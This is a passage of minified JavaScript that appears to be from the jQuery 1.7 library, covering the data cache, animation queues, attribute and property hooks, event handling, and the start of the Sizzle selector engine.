c=="string",l=a.nodeType,m=l?f.cache:a,n=l?a[j]:a[j]&&j,o=c==="events";if((!n||!m[n]||!o&&!e&&!m[n].data)&&k&&d===b)return;n||(l?a[j]=n=++f.uuid:n=j),m[n]||(m[n]={},l||(m[n].toJSON=f.noop));if(typeof c=="object"||typeof c=="function")e?m[n]=f.extend(m[n],c):m[n].data=f.extend(m[n].data,c);g=h=m[n],e||(h.data||(h.data={}),h=h.data),d!==b&&(h[f.camelCase(c)]=d);if(o&&!h[c])return g.events;k?(i=h[c],i==null&&(i=h[f.camelCase(c)])):i=h;return i}},removeData:function(a,b,c){if(!!f.acceptData(a)){var d,e,g,h=f.expando,i=a.nodeType,j=i?f.cache:a,k=i?a[h]:h;if(!j[k])return;if(b){d=c?j[k]:j[k].data;if(d){f.isArray(b)||(b in d?b=[b]:(b=f.camelCase(b),b in d?b=[b]:b=b.split(" ")));for(e=0,g=b.length;e<g;e++)delete d[b[e]];if(!(c?m:f.isEmptyObject)(d))return}}if(!c){delete j[k].data;if(!m(j[k]))return}f.support.deleteExpando||!j.setInterval?delete j[k]:j[k]=null,i&&(f.support.deleteExpando?delete a[h]:a.removeAttribute?a.removeAttribute(h):a[h]=null)}},_data:function(a,b,c){return f.data(a,b,c,!0)},acceptData:function(a){if(a.nodeName){var b=f.noData[a.nodeName.toLowerCase()];if(b)return b!==!0&&a.getAttribute("classid")===b}return!0}}),f.fn.extend({data:function(a,c){var d,e,g,h=null;if(typeof a=="undefined"){if(this.length){h=f.data(this[0]);if(this[0].nodeType===1&&!f._data(this[0],"parsedAttrs")){e=this[0].attributes;for(var i=0,j=e.length;i<j;i++)g=e[i].name,g.indexOf("data-")===0&&(g=f.camelCase(g.substring(5)),l(this[0],g,h[g]));f._data(this[0],"parsedAttrs",!0)}}return h}if(typeof a=="object")return this.each(function(){f.data(this,a)});d=a.split("."),d[1]=d[1]?"."+d[1]:"";if(c===b){h=this.triggerHandler("getData"+d[1]+"!",[d[0]]),h===b&&this.length&&(h=f.data(this[0],a),h=l(this[0],a,h));return h===b&&d[1]?this.data(d[0]):h}return this.each(function(){var b=f(this),e=[d[0],c];b.triggerHandler("setData"+d[1]+"!",e),f.data(this,a,c),b.triggerHandler("changeData"+d[1]+"!",e)})},removeData:function(a){return this.each(function(){f.removeData(this,a)})}}),f.extend({_mark:function(a,b){a&&(b=(b||"fx")+"mark",f._data(a,b,(f._data(a,b)||0)+1))},_unmark:function(a,b,c){a!==!0&&(c=b,b=a,a=!1);if(b){c=c||"fx";var d=c+"mark",e=a?0:(f._data(b,d)||1)-1;e?f._data(b,d,e):(f.removeData(b,d,!0),n(b,c,"mark"))}},queue:function(a,b,c){var d;if(a){b=(b||"fx")+"queue",d=f._data(a,b),c&&(!d||f.isArray(c)?d=f._data(a,b,f.makeArray(c)):d.push(c));return d||[]}},dequeue:function(a,b){b=b||"fx";var c=f.queue(a,b),d=c.shift(),e={};d==="inprogress"&&(d=c.shift()),d&&(b==="fx"&&c.unshift("inprogress"),f._data(a,b+".run",e),d.call(a,function(){f.dequeue(a,b)},e)),c.length||(f.removeData(a,b+"queue "+b+".run",!0),n(a,b,"queue"))}}),f.fn.extend({queue:function(a,c){typeof a!="string"&&(c=a,a="fx");if(c===b)return f.queue(this[0],a);return this.each(function(){var b=f.queue(this,a,c);a==="fx"&&b[0]!=="inprogress"&&f.dequeue(this,a)})},dequeue:function(a){return this.each(function(){f.dequeue(this,a)})},delay:function(a,b){a=f.fx?f.fx.speeds[a]||a:a,b=b||"fx";return this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,c){function m(){--h||d.resolveWith(e,[e])}typeof a!="string"&&(c=a,a=b),a=a||"fx";var d=f.Deferred(),e=this,g=e.length,h=1,i=a+"defer",j=a+"queue",k=a+"mark",l;while(g--)if(l=f.data(e[g],i,b,!0)||(f.data(e[g],j,b,!0)||f.data(e[g],k,b,!0))&&f.data(e[g],i,f.Callbacks("once memory"),!0))h++,l.add(m);m();return d.promise()}});var o=/[\n\t\r]/g,p=/\s+/,q=/\r/g,r=/^(?:button|input)$/i,s=/^(?:button|input|object|select|textarea)$/i,t=/^a(?:rea)?$/i,u=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,v=f.support.getSetAttribute,w,x,y;f.fn.extend({attr:function(a,b){return f.access(this,a,b,!0,f.attr)},removeAttr:function(a){return this.each(function(){f.removeAttr(this,a)})},prop:function(a,b){return f.access(this,a,b,!0,f.prop)},removeProp:function(a){a=f.propFix[a]||a;return this.each(function(){try{this[a]=b,delete this[a]}catch(c){}})},addClass:function(a){var b,c,d,e,g,h,i;if(f.isFunction(a))return this.each(function(b){f(this).addClass(a.call(this,b,this.className))});if(a&&typeof a=="string"){b=a.split(p);for(c=0,d=this.length;c<d;c++){e=this[c];if(e.nodeType===1)if(!e.className&&b.length===1)e.className=a;else{g=" "+e.className+" ";for(h=0,i=b.length;h<i;h++)~g.indexOf(" "+b[h]+" ")||(g+=b[h]+" ");e.className=f.trim(g)}}}return this},removeClass:function(a){var c,d,e,g,h,i,j;if(f.isFunction(a))return this.each(function(b){f(this).removeClass(a.call(this,b,this.className))});if(a&&typeof a=="string"||a===b){c=(a||"").split(p);for(d=0,e=this.length;d<e;d++){g=this[d];if(g.nodeType===1&&g.className)if(a){h=(" "+g.className+" ").replace(o," ");for(i=0,j=c.length;i<j;i++)h=h.replace(" "+c[i]+" "," ");g.className=f.trim(h)}else g.className=""}}return this},toggleClass:function(a,b){var c=typeof a,d=typeof b=="boolean";if(f.isFunction(a))return this.each(function(c){f(this).toggleClass(a.call(this,c,this.className,b),b)});return this.each(function(){if(c==="string"){var e,g=0,h=f(this),i=b,j=a.split(p);while(e=j[g++])i=d?i:!h.hasClass(e),h[i?"addClass":"removeClass"](e)}else if(c==="undefined"||c==="boolean")this.className&&f._data(this,"__className__",this.className),this.className=this.className||a===!1?"":f._data(this,"__className__")||""})},hasClass:function(a){var b=" "+a+" ",c=0,d=this.length;for(;c<d;c++)if(this[c].nodeType===1&&(" "+this[c].className+" ").replace(o," ").indexOf(b)>-1)return!0;return!1},val:function(a){var c,d,e,g=this[0];{if(!!arguments.length){e=f.isFunction(a);return this.each(function(d){var g=f(this),h;if(this.nodeType===1){e?h=a.call(this,d,g.val()):h=a,h==null?h="":typeof h=="number"?h+="":f.isArray(h)&&(h=f.map(h,function(a){return a==null?"":a+""})),c=f.valHooks[this.nodeName.toLowerCase()]||f.valHooks[this.type];if(!c||!("set"in c)||c.set(this,h,"value")===b)this.value=h}})}if(g){c=f.valHooks[g.nodeName.toLowerCase()]||f.valHooks[g.type];if(c&&"get"in c&&(d=c.get(g,"value"))!==b)return d;d=g.value;return typeof d=="string"?d.replace(q,""):d==null?"":d}}}}),f.extend({valHooks:{option:{get:function(a){var b=a.attributes.value;return!b||b.specified?a.value:a.text}},select:{get:function(a){var b,c,d,e,g=a.selectedIndex,h=[],i=a.options,j=a.type==="select-one";if(g<0)return null;c=j?g:0,d=j?g+1:i.length;for(;c<d;c++){e=i[c];if(e.selected&&(f.support.optDisabled?!e.disabled:e.getAttribute("disabled")===null)&&(!e.parentNode.disabled||!f.nodeName(e.parentNode,"optgroup"))){b=f(e).val();if(j)return b;h.push(b)}}if(j&&!h.length&&i.length)return f(i[g]).val();return h},set:function(a,b){var c=f.makeArray(b);f(a).find("option").each(function(){this.selected=f.inArray(f(this).val(),c)>=0}),c.length||(a.selectedIndex=-1);return c}}},attrFn:{val:!0,css:!0,html:!0,text:!0,data:!0,width:!0,height:!0,offset:!0},attr:function(a,c,d,e){var g,h,i,j=a.nodeType;if(!!a&&j!==3&&j!==8&&j!==2){if(e&&c in f.attrFn)return f(a)[c](d);if(typeof a.getAttribute=="undefined")return f.prop(a,c,d);i=j!==1||!f.isXMLDoc(a),i&&(c=c.toLowerCase(),h=f.attrHooks[c]||(u.test(c)?x:w));if(d!==b){if(d===null){f.removeAttr(a,c);return}if(h&&"set"in h&&i&&(g=h.set(a,d,c))!==b)return g;a.setAttribute(c,""+d);return d}if(h&&"get"in h&&i&&(g=h.get(a,c))!==null)return g;g=a.getAttribute(c);return g===null?b:g}},removeAttr:function(a,b){var c,d,e,g,h=0;if(b&&a.nodeType===1){d=b.toLowerCase().split(p),g=d.length;for(;h<g;h++)e=d[h],e&&(c=f.propFix[e]||e,f.attr(a,e,""),a.removeAttribute(v?e:c),u.test(e)&&c in a&&(a[c]=!1))}},attrHooks:{type:{set:function(a,b){if(r.test(a.nodeName)&&a.parentNode)f.error("type property can't be changed");else if(!f.support.radioValue&&b==="radio"&&f.nodeName(a,"input")){var c=a.value;a.setAttribute("type",b),c&&(a.value=c);return b}}},value:{get:function(a,b){if(w&&f.nodeName(a,"button"))return w.get(a,b);return b in a?a.value:null},set:function(a,b,c){if(w&&f.nodeName(a,"button"))return w.set(a,b,c);a.value=b}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(a,c,d){var e,g,h,i=a.nodeType;if(!!a&&i!==3&&i!==8&&i!==2){h=i!==1||!f.isXMLDoc(a),h&&(c=f.propFix[c]||c,g=f.propHooks[c]);return d!==b?g&&"set"in g&&(e=g.set(a,d,c))!==b?e:a[c]=d:g&&"get"in g&&(e=g.get(a,c))!==null?e:a[c]}},propHooks:{tabIndex:{get:function(a){var c=a.getAttributeNode("tabindex");return c&&c.specified?parseInt(c.value,10):s.test(a.nodeName)||t.test(a.nodeName)&&a.href?0:b}}}}),f.attrHooks.tabindex=f.propHooks.tabIndex,x={get:function(a,c){var d,e=f.prop(a,c);return e===!0||typeof e!="boolean"&&(d=a.getAttributeNode(c))&&d.nodeValue!==!1?c.toLowerCase():b},set:function(a,b,c){var d;b===!1?f.removeAttr(a,c):(d=f.propFix[c]||c,d in a&&(a[d]=!0),a.setAttribute(c,c.toLowerCase()));return c}},v||(y={name:!0,id:!0},w=f.valHooks.button={get:function(a,c){var d;d=a.getAttributeNode(c);return d&&(y[c]?d.nodeValue!=="":d.specified)?d.nodeValue:b},set:function(a,b,d){var e=a.getAttributeNode(d);e||(e=c.createAttribute(d),a.setAttributeNode(e));return e.nodeValue=b+""}},f.attrHooks.tabindex.set=w.set,f.each(["width","height"],function(a,b){f.attrHooks[b]=f.extend(f.attrHooks[b],{set:function(a,c){if(c===""){a.setAttribute(b,"auto");return c}}})}),f.attrHooks.contenteditable={get:w.get,set:function(a,b,c){b===""&&(b="false"),w.set(a,b,c)}}),f.support.hrefNormalized||f.each(["href","src","width","height"],function(a,c){f.attrHooks[c]=f.extend(f.attrHooks[c],{get:function(a){var d=a.getAttribute(c,2);return d===null?b:d}})}),f.support.style||(f.attrHooks.style={get:function(a){return a.style.cssText.toLowerCase()||b},set:function(a,b){return a.style.cssText=""+b}}),f.support.optSelected||(f.propHooks.selected=f.extend(f.propHooks.selected,{get:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex);return null}})),f.support.enctype||(f.propFix.enctype="encoding"),f.support.checkOn||f.each(["radio","checkbox"],function(){f.valHooks[this]={get:function(a){return a.getAttribute("value")===null?"on":a.value}}}),f.each(["radio","checkbox"],function(){f.valHooks[this]=f.extend(f.valHooks[this],{set:function(a,b){if(f.isArray(b))return a.checked=f.inArray(f(a).val(),b)>=0}})});var z=/^(?:textarea|input|select)$/i,A=/^([^\.]*)?(?:\.(.+))?$/,B=/\bhover(\.\S+)?\b/,C=/^key/,D=/^(?:mouse|contextmenu)|click/,E=/^(?:focusinfocus|focusoutblur)$/,F=/^(\w*)(?:#([\w\-]+))?(?:\.([\w\-]+))?$/,G=function(a){var b=F.exec(a);b&&(b[1]=(b[1]||"").toLowerCase(),b[3]=b[3]&&new RegExp("(?:^|\\s)"+b[3]+"(?:\\s|$)"));return b},H=function(a,b){var c=a.attributes||{};return(!b[1]||a.nodeName.toLowerCase()===b[1])&&(!b[2]||(c.id||{}).value===b[2])&&(!b[3]||b[3].test((c["class"]||{}).value))},I=function(a){return f.event.special.hover?a:a.replace(B,"mouseenter$1 mouseleave$1")};
-f.event={add:function(a,c,d,e,g){var h,i,j,k,l,m,n,o,p,q,r,s;if(!(a.nodeType===3||a.nodeType===8||!c||!d||!(h=f._data(a)))){d.handler&&(p=d,d=p.handler),d.guid||(d.guid=f.guid++),j=h.events,j||(h.events=j={}),i=h.handle,i||(h.handle=i=function(a){return typeof f!="undefined"&&(!a||f.event.triggered!==a.type)?f.event.dispatch.apply(i.elem,arguments):b},i.elem=a),c=f.trim(I(c)).split(" ");for(k=0;k<c.length;k++){l=A.exec(c[k])||[],m=l[1],n=(l[2]||"").split(".").sort(),s=f.event.special[m]||{},m=(g?s.delegateType:s.bindType)||m,s=f.event.special[m]||{},o=f.extend({type:m,origType:l[1],data:e,handler:d,guid:d.guid,selector:g,quick:G(g),namespace:n.join(".")},p),r=j[m];if(!r){r=j[m]=[],r.delegateCount=0;if(!s.setup||s.setup.call(a,e,n,i)===!1)a.addEventListener?a.addEventListener(m,i,!1):a.attachEvent&&a.attachEvent("on"+m,i)}s.add&&(s.add.call(a,o),o.handler.guid||(o.handler.guid=d.guid)),g?r.splice(r.delegateCount++,0,o):r.push(o),f.event.global[m]=!0}a=null}},global:{},remove:function(a,b,c,d,e){var g=f.hasData(a)&&f._data(a),h,i,j,k,l,m,n,o,p,q,r,s;if(!!g&&!!(o=g.events)){b=f.trim(I(b||"")).split(" ");for(h=0;h<b.length;h++){i=A.exec(b[h])||[],j=k=i[1],l=i[2];if(!j){for(j in o)f.event.remove(a,j+b[h],c,d,!0);continue}p=f.event.special[j]||{},j=(d?p.delegateType:p.bindType)||j,r=o[j]||[],m=r.length,l=l?new RegExp("(^|\\.)"+l.split(".").sort().join("\\.(?:.*\\.)?")+"(\\.|$)"):null;for(n=0;n<r.length;n++)s=r[n],(e||k===s.origType)&&(!c||c.guid===s.guid)&&(!l||l.test(s.namespace))&&(!d||d===s.selector||d==="**"&&s.selector)&&(r.splice(n--,1),s.selector&&r.delegateCount--,p.remove&&p.remove.call(a,s));r.length===0&&m!==r.length&&((!p.teardown||p.teardown.call(a,l)===!1)&&f.removeEvent(a,j,g.handle),delete o[j])}f.isEmptyObject(o)&&(q=g.handle,q&&(q.elem=null),f.removeData(a,["events","handle"],!0))}},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(c,d,e,g){if(!e||e.nodeType!==3&&e.nodeType!==8){var h=c.type||c,i=[],j,k,l,m,n,o,p,q,r,s;if(E.test(h+f.event.triggered))return;h.indexOf("!")>=0&&(h=h.slice(0,-1),k=!0),h.indexOf(".")>=0&&(i=h.split("."),h=i.shift(),i.sort());if((!e||f.event.customEvent[h])&&!f.event.global[h])return;c=typeof c=="object"?c[f.expando]?c:new f.Event(h,c):new f.Event(h),c.type=h,c.isTrigger=!0,c.exclusive=k,c.namespace=i.join("."),c.namespace_re=c.namespace?new RegExp("(^|\\.)"+i.join("\\.(?:.*\\.)?")+"(\\.|$)"):null,o=h.indexOf(":")<0?"on"+h:"";if(!e){j=f.cache;for(l in j)j[l].events&&j[l].events[h]&&f.event.trigger(c,d,j[l].handle.elem,!0);return}c.result=b,c.target||(c.target=e),d=d!=null?f.makeArray(d):[],d.unshift(c),p=f.event.special[h]||{};if(p.trigger&&p.trigger.apply(e,d)===!1)return;r=[[e,p.bindType||h]];if(!g&&!p.noBubble&&!f.isWindow(e)){s=p.delegateType||h,m=E.test(s+h)?e:e.parentNode,n=null;for(;m;m=m.parentNode)r.push([m,s]),n=m;n&&n===e.ownerDocument&&r.push([n.defaultView||n.parentWindow||a,s])}for(l=0;l<r.length&&!c.isPropagationStopped();l++)m=r[l][0],c.type=r[l][1],q=(f._data(m,"events")||{})[c.type]&&f._data(m,"handle"),q&&q.apply(m,d),q=o&&m[o],q&&f.acceptData(m)&&q.apply(m,d)===!1&&c.preventDefault();c.type=h,!g&&!c.isDefaultPrevented()&&(!p._default||p._default.apply(e.ownerDocument,d)===!1)&&(h!=="click"||!f.nodeName(e,"a"))&&f.acceptData(e)&&o&&e[h]&&(h!=="focus"&&h!=="blur"||c.target.offsetWidth!==0)&&!f.isWindow(e)&&(n=e[o],n&&(e[o]=null),f.event.triggered=h,e[h](),f.event.triggered=b,n&&(e[o]=n));return c.result}},dispatch:function(c){c=f.event.fix(c||a.event);var d=(f._data(this,"events")||{})[c.type]||[],e=d.delegateCount,g=[].slice.call(arguments,0),h=!c.exclusive&&!c.namespace,i=[],j,k,l,m,n,o,p,q,r,s,t;g[0]=c,c.delegateTarget=this;if(e&&!c.target.disabled&&(!c.button||c.type!=="click")){m=f(this),m.context=this.ownerDocument||this;for(l=c.target;l!=this;l=l.parentNode||this){o={},q=[],m[0]=l;for(j=0;j<e;j++)r=d[j],s=r.selector,o[s]===b&&(o[s]=r.quick?H(l,r.quick):m.is(s)),o[s]&&q.push(r);q.length&&i.push({elem:l,matches:q})}}d.length>e&&i.push({elem:this,matches:d.slice(e)});for(j=0;j<i.length&&!c.isPropagationStopped();j++){p=i[j],c.currentTarget=p.elem;for(k=0;k<p.matches.length&&!c.isImmediatePropagationStopped();k++){r=p.matches[k];if(h||!c.namespace&&!r.namespace||c.namespace_re&&c.namespace_re.test(r.namespace))c.data=r.data,c.handleObj=r,n=((f.event.special[r.origType]||{}).handle||r.handler).apply(p.elem,g),n!==b&&(c.result=n,n===!1&&(c.preventDefault(),c.stopPropagation()))}}return c.result},props:"attrChange attrName relatedNode srcElement altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){a.which==null&&(a.which=b.charCode!=null?b.charCode:b.keyCode);return a}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,d){var e,f,g,h=d.button,i=d.fromElement;a.pageX==null&&d.clientX!=null&&(e=a.target.ownerDocument||c,f=e.documentElement,g=e.body,a.pageX=d.clientX+(f&&f.scrollLeft||g&&g.scrollLeft||0)-(f&&f.clientLeft||g&&g.clientLeft||0),a.pageY=d.clientY+(f&&f.scrollTop||g&&g.scrollTop||0)-(f&&f.clientTop||g&&g.clientTop||0)),!a.relatedTarget&&i&&(a.relatedTarget=i===a.target?d.toElement:i),!a.which&&h!==b&&(a.which=h&1?1:h&2?3:h&4?2:0);return a}},fix:function(a){if(a[f.expando])return a;var d,e,g=a,h=f.event.fixHooks[a.type]||{},i=h.props?this.props.concat(h.props):this.props;a=f.Event(g);for(d=i.length;d;)e=i[--d],a[e]=g[e];a.target||(a.target=g.srcElement||c),a.target.nodeType===3&&(a.target=a.target.parentNode),a.metaKey===b&&(a.metaKey=a.ctrlKey);return h.filter?h.filter(a,g):a},special:{ready:{setup:f.bindReady},load:{noBubble:!0},focus:{delegateType:"focusin"},blur:{delegateType:"focusout"},beforeunload:{setup:function(a,b,c){f.isWindow(this)&&(this.onbeforeunload=c)},teardown:function(a,b){this.onbeforeunload===b&&(this.onbeforeunload=null)}}},simulate:function(a,b,c,d){var e=f.extend(new f.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?f.event.trigger(e,null,b):f.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},f.event.handle=f.event.dispatch,f.removeEvent=c.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){a.detachEvent&&a.detachEvent("on"+b,c)},f.Event=function(a,b){if(!(this instanceof f.Event))return new f.Event(a,b);a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||a.returnValue===!1||a.getPreventDefault&&a.getPreventDefault()?K:J):this.type=a,b&&f.extend(this,b),this.timeStamp=a&&a.timeStamp||f.now(),this[f.expando]=!0},f.Event.prototype={preventDefault:function(){this.isDefaultPrevented=K;var a=this.originalEvent;!a||(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){this.isPropagationStopped=K;var a=this.originalEvent;!a||(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=K,this.stopPropagation()},isDefaultPrevented:J,isPropagationStopped:J,isImmediatePropagationStopped:J},f.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){f.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c=this,d=a.relatedTarget,e=a.handleObj,g=e.selector,h;if(!d||d!==c&&!f.contains(c,d))a.type=e.origType,h=e.handler.apply(this,arguments),a.type=b;return h}}}),f.support.submitBubbles||(f.event.special.submit={setup:function(){if(f.nodeName(this,"form"))return!1;f.event.add(this,"click._submit keypress._submit",function(a){var c=a.target,d=f.nodeName(c,"input")||f.nodeName(c,"button")?c.form:b;d&&!d._submit_attached&&(f.event.add(d,"submit._submit",function(a){this.parentNode&&!a.isTrigger&&f.event.simulate("submit",this.parentNode,a,!0)}),d._submit_attached=!0)})},teardown:function(){if(f.nodeName(this,"form"))return!1;f.event.remove(this,"._submit")}}),f.support.changeBubbles||(f.event.special.change={setup:function(){if(z.test(this.nodeName)){if(this.type==="checkbox"||this.type==="radio")f.event.add(this,"propertychange._change",function(a){a.originalEvent.propertyName==="checked"&&(this._just_changed=!0)}),f.event.add(this,"click._change",function(a){this._just_changed&&!a.isTrigger&&(this._just_changed=!1,f.event.simulate("change",this,a,!0))});return!1}f.event.add(this,"beforeactivate._change",function(a){var b=a.target;z.test(b.nodeName)&&!b._change_attached&&(f.event.add(b,"change._change",function(a){this.parentNode&&!a.isSimulated&&!a.isTrigger&&f.event.simulate("change",this.parentNode,a,!0)}),b._change_attached=!0)})},handle:function(a){var b=a.target;if(this!==b||a.isSimulated||a.isTrigger||b.type!=="radio"&&b.type!=="checkbox")return a.handleObj.handler.apply(this,arguments)},teardown:function(){f.event.remove(this,"._change");return z.test(this.nodeName)}}),f.support.focusinBubbles||f.each({focus:"focusin",blur:"focusout"},function(a,b){var d=0,e=function(a){f.event.simulate(b,a.target,f.event.fix(a),!0)};f.event.special[b]={setup:function(){d++===0&&c.addEventListener(a,e,!0)},teardown:function(){--d===0&&c.removeEventListener(a,e,!0)}}}),f.fn.extend({on:function(a,c,d,e,g){var h,i;if(typeof a=="object"){typeof c!="string"&&(d=c,c=b);for(i in a)this.on(i,c,d,a[i],g);return this}d==null&&e==null?(e=c,d=c=b):e==null&&(typeof c=="string"?(e=d,d=b):(e=d,d=c,c=b));if(e===!1)e=J;else if(!e)return this;g===1&&(h=e,e=function(a){f().off(a);return h.apply(this,arguments)},e.guid=h.guid||(h.guid=f.guid++));return this.each(function(){f.event.add(this,a,e,d,c)})},one:function(a,b,c,d){return this.on.call(this,a,b,c,d,1)},off:function(a,c,d){if(a&&a.preventDefault&&a.handleObj){var e=a.handleObj;f(a.delegateTarget).off(e.namespace?e.type+"."+e.namespace:e.type,e.selector,e.handler);return this}if(typeof a=="object"){for(var g in a)this.off(g,c,a[g]);return this}if(c===!1||typeof c=="function")d=c,c=b;d===!1&&(d=J);return this.each(function(){f.event.remove(this,a,d,c)})},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},live:function(a,b,c){f(this.context).on(a,this.selector,b,c);return this},die:function(a,b){f(this.context).off(a,this.selector||"**",b);return this},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return arguments.length==1?this.off(a,"**"):this.off(b,a,c)},trigger:function(a,b){return this.each(function(){f.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0])return f.event.trigger(a,b,this[0],!0)},toggle:function(a){var b=arguments,c=a.guid||f.guid++,d=0,e=function(c){var e=(f._data(this,"lastToggle"+a.guid)||0)%d;f._data(this,"lastToggle"+a.guid,e+1),c.preventDefault();return b[e].apply(this,arguments)||!1};e.guid=c;while(d<b.length)b[d++].guid=c;return this.click(e)},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}}),f.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){f.fn[b]=function(a,c){c==null&&(c=a,a=null);return arguments.length>0?this.on(b,null,a,c):this.trigger(b)},f.attrFn&&(f.attrFn[b]=!0),C.test(b)&&(f.event.fixHooks[b]=f.event.keyHooks),D.test(b)&&(f.event.fixHooks[b]=f.event.mouseHooks)}),function(){function x(a,b,c,e,f,g){for(var h=0,i=e.length;h<i;h++){var j=e[h];if(j){var k=!1;j=j[a];while(j){if(j[d]===c){k=e[j.sizset];break}if(j.nodeType===1){g||(j[d]=c,j.sizset=h);if(typeof b!="string"){if(j===b){k=!0;break}}else if(m.filter(b,[j]).length>0){k=j;break}}j=j[a]}e[h]=k}}}function w(a,b,c,e,f,g){for(var h=0,i=e.length;h<i;h++){var j=e[h];if(j){var k=!1;j=j[a];while(j){if(j[d]===c){k=e[j.sizset];break}j.nodeType===1&&!g&&(j[d]=c,j.sizset=h);if(j.nodeName.toLowerCase()===b){k=j;break}j=j[a]}e[h]=k}}}var a=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^\[\]]*\]|['"][^'"]*['"]|[^\[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,d="sizcache"+(Math.random()+"").replace(".",""),e=0,g=Object.prototype.toString,h=!1,i=!0,j=/\\/g,k=/\r\n/g,l=/\W/;[0,0].sort(function(){i=!1;return 0});var m=function(b,d,e,f){e=e||[],d=d||c;var h=d;if(d.nodeType!==1&&d.nodeType!==9)return[];if(!b||typeof b!="string")return e;var i,j,k,l,n,q,r,t,u=!0,v=m.isXML(d),w=[],x=b;do{a.exec(""),i=a.exec(x);if(i){x=i[3],w.push(i[1]);if(i[2]){l=i[3];break}}}while(i);if(w.length>1&&p.exec(b))if(w.length===2&&o.relative[w[0]])j=y(w[0]+w[1],d,f);else{j=o.relative[w[0]]?[d]:m(w.shift(),d);while(w.length)b=w.shift(),o.relative[b]&&(b+=w.shift()),j=y(b,j,f)}else{!f&&w.length>1&&d.nodeType===9&&!v&&o.match.ID.test(w[0])&&!o.match.ID.test(w[w.length-1])&&(n=m.find(w.shift(),d,v),d=n.expr?m.filter(n.expr,n.set)[0]:n.set[0]);if(d){n=f?{expr:w.pop(),set:s(f)}:m.find(w.pop(),w.length===1&&(w[0]==="~"||w[0]==="+")&&d.parentNode?d.parentNode:d,v),j=n.expr?m.filter(n.expr,n.set):n.set,w.length>0?k=s(j):u=!1;while(w.length)q=w.pop(),r=q,o.relative[q]?r=w.pop():q="",r==null&&(r=d),o.relative[q](k,r,v)}else k=w=[]}k||(k=j),k||m.error(q||b);if(g.call(k)==="[object Array]")if(!u)e.push.apply(e,k);else if(d&&d.nodeType===1)for(t=0;k[t]!=null;t++)k[t]&&(k[t]===!0||k[t].nodeType===1&&m.contains(d,k[t]))&&e.push(j[t]);else for(t=0;k[t]!=null;t++)k[t]&&k[t].nodeType===1&&e.push(j[t]);else s(k,e);l&&(m(l,h,e,f),m.uniqueSort(e));return e};m.uniqueSort=function(a){if(u){h=i,a.sort(u);if(h)for(var b=1;b<a.length;b++)a[b]===a[b-1]&&a.splice(b--,1)}return a},m.matches=function(a,b){return m(a,null,null,b)},m.matchesSelector=function(a,b){return m(b,null,null,[a]).length>0},m.find=function(a,b,c){var d,e,f,g,h,i;if(!a)return[];for(e=0,f=o.order.length;e<f;e++){h=o.order[e];if(g=o.leftMatch[h].exec(a)){i=g[1],g.splice(1,1);if(i.substr(i.length-1)!=="\\"){g[1]=(g[1]||"").replace(j,""),d=o.find[h](g,b,c);if(d!=null){a=a.replace(o.match[h],"");break}}}}d||(d=typeof b.getElementsByTagName!="undefined"?b.getElementsByTagName("*"):[]);return{set:d,expr:a}},m.filter=function(a,c,d,e){var f,g,h,i,j,k,l,n,p,q=a,r=[],s=c,t=c&&c[0]&&m.isXML(c[0]);while(a&&c.length){for(h in o.filter)if((f=o.leftMatch[h].exec(a))!=null&&f[2]){k=o.filter[h],l=f[1],g=!1,f.splice(1,1);if(l.substr(l.length-1)==="\\")continue;s===r&&(r=[]);if(o.preFilter[h]){f=o.preFilter[h](f,s,d,r,e,t);if(!f)g=i=!0;else if(f===!0)continue}if(f)for(n=0;(j=s[n])!=null;n++)j&&(i=k(j,f,n,s),p=e^i,d&&i!=null?p?g=!0:s[n]=!1:p&&(r.push(j),g=!0));if(i!==b){d||(s=r),a=a.replace(o.match[h],"");if(!g)return[];break}}if(a===q)if(g==null)m.error(a);else break;q=a}return s},m.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)};var n=m.getText=function(a){var b,c,d=a.nodeType,e="";if(d){if(d===1||d===9){if(typeof a.textContent=="string")return a.textContent;if(typeof a.innerText=="string")return a.innerText.replace(k,"");for(a=a.firstChild;a;a=a.nextSibling)e+=n(a)}else if(d===3||d===4)return a.nodeValue}else for(b=0;c=a[b];b++)c.nodeType!==8&&(e+=n(c));return 